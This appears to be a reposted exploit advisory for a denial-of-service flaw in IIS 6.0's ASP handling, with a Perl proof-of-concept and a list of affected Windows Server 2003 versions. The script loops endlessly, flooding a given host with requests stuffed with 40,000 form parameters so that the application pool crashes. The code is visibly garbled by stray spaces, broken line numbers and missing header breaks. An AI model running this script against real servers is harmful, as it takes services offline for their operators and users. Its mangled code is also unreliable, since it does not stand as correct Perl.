An attacker sends a POST request to the ASP page. the post request contains more than 40000 Request Parameters and uses x-www-form-urlencoded encoding when sending the request. Attackers exploit this vulnerability to cause the IIS auxiliary process to crash, causing the default application pool to be disabled.
PoC Exploit:
01. # IIS 6.0 ASP DoS PoC
02. # usage: perl IISdos. pl 03. use IO: Socket;
04. $ | = 1;
05. $ host = $ ARGV [0];
06. $ script = $ ARGV [1];
07. while (1 ){
08. $ sock = IO: Socket: INET-> new (PeerAddr => $ host,
09. PeerPort => http (80 ),
10. Proto => tcp );
11. $ write = "C = A &" x 40000;
12. print $ sock "HEAD/$ script HTTP/1.1 Host: $ host"
13 .. "Connection: CloseContent-Type: application/x-www-form-urlencoded"
14 .. "Content-Length:". length ($ write). "". $ write;
15. print ".";
16. while (<$ sock> ){
17. print;
18 .}
19 .}
20.
21.
22. EDB Notes:
23. in our tests, a specific setting has to be modified in metabase. xml in order to trigger the exhaustion. tested systems that are vulnerable: Windows Server 2003 Standard SP2, Windows Server 2003 Standard SP1, Windows Server 2003 Standard SP0
Solution: Pay attention to Microsoft patch upgrade and timely upgrade